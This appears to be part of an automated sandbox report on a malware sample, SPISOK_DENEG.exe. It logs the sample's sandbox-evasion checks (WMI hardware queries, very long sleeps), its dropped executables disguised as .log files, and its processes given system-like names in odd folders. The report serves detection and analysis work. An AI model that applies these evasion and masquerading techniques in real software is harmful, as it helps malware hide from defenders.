                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 1B090000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeMemory allocated: 1B1C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeMemory allocated: BA0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeMemory allocated: 1A890000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exeMemory allocated: 1020000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exeMemory allocated: 1110000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exeMemory allocated: 1AC20000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeMemory allocated: E90000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeMemory allocated: 16E0000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeMemory allocated: 1B320000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeMemory allocated: 1140000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeMemory allocated: F80000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: ED0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 10A0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 2B90000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: 1AD70000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeDropped PE file which has not been started: C:\Users\user\Desktop\CqAggkYA.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeDropped PE file which has not been started: C:\Users\user\Desktop\UxRLAXDP.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeDropped PE file which has not been started: C:\Users\user\Desktop\tHgRxHTS.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeDropped PE file which has not been started: C:\Users\user\Desktop\jYNBNfNl.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeDropped PE file which has not been started: C:\Users\user\Desktop\YsSdHCtI.logJump to dropped file
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23523
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe TID: 7976Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe TID: 7568Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\Documents\dllhost.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\Documents\dllhost.exe TID: 4956Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe TID: 7596Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe TID: 7692Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe TID: 7320Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7944Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000DA69B
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000EC220
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EE6A3 VirtualQuery,GetSystemInfo,0_2_000EE6A3
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: SPISOK_DENEG.exe, 00000000.00000003.1676418346.0000000002B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: ChainPortsurrogate.exe, 00000004.00000002.1804763678.000000001B9AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                  Source: wscript.exe, 00000001.00000003.1738780933.0000000002E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
                                  Source: wscript.exe, 00000001.00000003.1738780933.0000000002E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: w32tm.exe, 00000027.00000002.1850782659.00000252AE8F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeAPI call chain: ExitProcess graph end nodegraph_0-23752
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000EF838
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000F7DEE mov eax, dword ptr fs:[00000030h]0_2_000F7DEE
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000FC030 GetProcessHeap,0_2_000FC030
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeProcess token adjusted: Debug
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess token adjusted: Debug
                                  Source: C:\Users\Default\Documents\dllhost.exeProcess token adjusted: Debug
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess token adjusted: Debug
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeProcess token adjusted: Debug
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess token adjusted: Debug
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeProcess token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess token adjusted: Debug
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000EF838
